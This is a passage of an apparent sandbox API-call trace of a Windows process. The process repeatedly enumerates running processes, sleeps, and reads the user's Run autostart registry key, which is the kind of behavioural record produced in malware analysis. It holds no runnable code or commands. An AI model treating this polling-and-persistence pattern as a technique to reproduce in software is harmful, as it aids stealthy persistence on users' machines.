RegionSize=0x14e638*=0x10000) returned 0x0 [0183.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.540] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.551] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.551] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.551] NtClose (Handle=0x154) returned 0x0 [0183.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.555] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.566] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.566] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.566] NtClose (Handle=0x154) returned 0x0 [0183.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.582] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.582] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.582] NtClose (Handle=0x154) returned 0x0 [0183.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.587] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.597] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.597] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.597] NtClose (Handle=0x154) returned 0x0 [0183.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.604] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.612] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.613] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.613] NtClose (Handle=0x154) returned 0x0 [0183.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.617] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.632] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.632] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.632] NtClose (Handle=0x154) returned 0x0 [0183.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.636] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.643] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.644] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.644] NtClose (Handle=0x154) returned 0x0 [0183.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.647] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.659] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.659] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.659] NtClose (Handle=0x154) returned 0x0 [0183.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.663] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.675] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.675] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.675] NtClose (Handle=0x154) returned 0x0 [0183.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.679] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.691] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.691] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.691] NtClose (Handle=0x154) returned 0x0 [0183.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.696] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.706] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.706] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.706] NtClose (Handle=0x154) returned 0x0 [0183.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.710] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.722] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.722] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.722] NtClose (Handle=0x154) returned 0x0 [0183.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0183.727] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0183.738] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0183.738] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0183.738] NtClose (Handle=0x154) returned 0x0 [0183.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0183.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0183.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0183.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0183.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0183.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 